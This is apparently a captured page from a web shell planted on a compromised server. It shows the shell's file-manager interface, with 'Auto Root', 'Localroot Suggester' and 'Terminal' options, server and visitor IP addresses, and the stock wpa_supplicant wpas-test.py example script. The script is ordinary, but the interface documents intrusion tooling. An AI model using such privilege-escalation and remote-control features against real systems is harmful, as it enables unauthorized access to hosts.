Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.188.73.229
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
wpa_supplicant-2.6 /
examples /
Delete
Unzip
Name
Size
Permission
Date
Action
p2p
[ DIR ]
drwxr-xr-x
2022-01-26 17:33
60_wpa_supplicant
267
B
-rwxr-xr-x
2016-10-02 18:51
dbus-listen-preq.py
1.53
KB
-rw-r--r--
2016-10-02 18:51
ieee8021x.conf
269
B
-rw-r--r--
2016-10-02 18:51
openCryptoki.conf
1.12
KB
-rw-r--r--
2016-10-02 18:51
p2p-action-udhcp.sh
1.68
KB
-rwxr-xr-x
2016-10-02 18:51
p2p-action.sh
2.63
KB
-rwxr-xr-x
2016-10-02 18:51
p2p-nfc.py
19.73
KB
-rw-r--r--
2016-10-02 18:51
plaintext.conf
133
B
-rw-r--r--
2016-10-02 18:51
udhcpd-p2p.conf
2.86
KB
-rw-r--r--
2016-10-02 18:51
wep.conf
170
B
-rw-r--r--
2016-10-02 18:51
wpa-psk-tkip.conf
181
B
-rw-r--r--
2016-10-02 18:51
wpa2-eap-ccmp.conf
284
B
-rw-r--r--
2016-10-02 18:51
wpas-dbus-new-getall.py
1.7
KB
-rw-r--r--
2016-10-02 18:51
wpas-dbus-new-signals.py
5.93
KB
-rw-r--r--
2016-10-02 18:51
wpas-dbus-new-wps.py
2.17
KB
-rw-r--r--
2016-10-02 18:51
wpas-dbus-new.py
4.17
KB
-rw-r--r--
2016-10-02 18:51
wpas-test.py
2.51
KB
-rw-r--r--
2016-10-02 18:51
wps-ap-cli
1.15
KB
-rwxr-xr-x
2016-10-02 18:51
wps-nfc.py
15.31
KB
-rw-r--r--
2016-10-02 18:51
Save
Rename
#!/usr/bin/python import dbus import sys, os import time WPAS_DBUS_SERVICE = "fi.epitest.hostap.WPASupplicant" WPAS_DBUS_INTERFACE = "fi.epitest.hostap.WPASupplicant" WPAS_DBUS_OPATH = "/fi/epitest/hostap/WPASupplicant" WPAS_DBUS_INTERFACES_INTERFACE = "fi.epitest.hostap.WPASupplicant.Interface" WPAS_DBUS_INTERFACES_OPATH = "/fi/epitest/hostap/WPASupplicant/Interfaces" WPAS_DBUS_BSSID_INTERFACE = "fi.epitest.hostap.WPASupplicant.BSSID" def byte_array_to_string(s): import urllib r = "" for c in s: if c >= 32 and c < 127: r += "%c" % c else: r += urllib.quote(chr(c)) return r def main(): if len(sys.argv) != 2: print "Usage: wpas-test.py <interface>" os._exit(1) ifname = sys.argv[1] bus = dbus.SystemBus() wpas_obj = bus.get_object(WPAS_DBUS_SERVICE, WPAS_DBUS_OPATH) wpas = dbus.Interface(wpas_obj, WPAS_DBUS_INTERFACE) # See if wpa_supplicant already knows about this interface path = None try: path = wpas.getInterface(ifname) except dbus.dbus_bindings.DBusException, exc: if str(exc) != "wpa_supplicant knows nothing about this interface.": raise exc try: path = wpas.addInterface(ifname, {'driver': dbus.Variant('wext')}) except dbus.dbus_bindings.DBusException, exc: if str(exc) != "wpa_supplicant already controls this interface.": raise exc if_obj = bus.get_object(WPAS_DBUS_SERVICE, path) iface = dbus.Interface(if_obj, WPAS_DBUS_INTERFACES_INTERFACE) iface.scan() # Should really wait for the "scanResults" signal instead of sleeping time.sleep(5) res = iface.scanResults() print "Scanned wireless networks:" for opath in res: net_obj = bus.get_object(WPAS_DBUS_SERVICE, opath) net = dbus.Interface(net_obj, WPAS_DBUS_BSSID_INTERFACE) props = net.properties() # Convert the byte-array for SSID and BSSID to printable strings bssid = "" for item in props["bssid"]: bssid = bssid + ":%02x" % item bssid = bssid[1:] ssid = byte_array_to_string(props["ssid"]) wpa = "no" if props.has_key("wpaie"): wpa = "yes" wpa2 = "no" if props.has_key("rsnie"): wpa2 = "yes" freq = 0 if props.has_key("frequency"): freq = props["frequency"] caps = props["capabilities"] qual = props["quality"] level = props["level"] noise = props["noise"] maxrate = props["maxrate"] / 1000000 print " %s :: ssid='%s' wpa=%s wpa2=%s quality=%d%% rate=%d freq=%d" % (bssid, ssid, wpa, wpa2, qual, maxrate, freq) wpas.removeInterface(dbus.ObjectPath(path)) # Should fail here with unknown interface error iface.scan() if __name__ == "__main__": main()